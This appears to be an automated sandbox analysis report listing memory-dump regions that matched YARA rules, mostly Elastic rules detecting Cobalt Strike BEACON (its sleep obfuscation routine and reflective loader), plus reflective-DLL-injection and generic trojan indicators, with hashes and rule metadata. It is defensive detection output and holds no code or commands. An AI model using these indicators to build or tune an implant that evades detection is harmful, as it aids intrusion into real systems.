Source: 00000000.00000003.2008952668.00000215D77DA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3254228521.00000215D76E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2037561994.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.3255217619.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2009609332.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2023164219.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2035766145.00000215D7B92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2011785249.00000215D7B7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2022082585.00000215D7B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2018881215.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2008238134.00000215D7880000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2008238134.00000215D78F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2009131449.00000215D77E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000003.2008178877.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000003.2009082132.00000215D77DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
Source: 00000000.00000003.2016857846.00000215D7B94000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_b54b94ac reference_sample = 36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a, os = windows, severity = x86, description = Rule for beacon sleep obfuscation routine, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = 2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8, id = b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca, last_modified = 2022-01-13
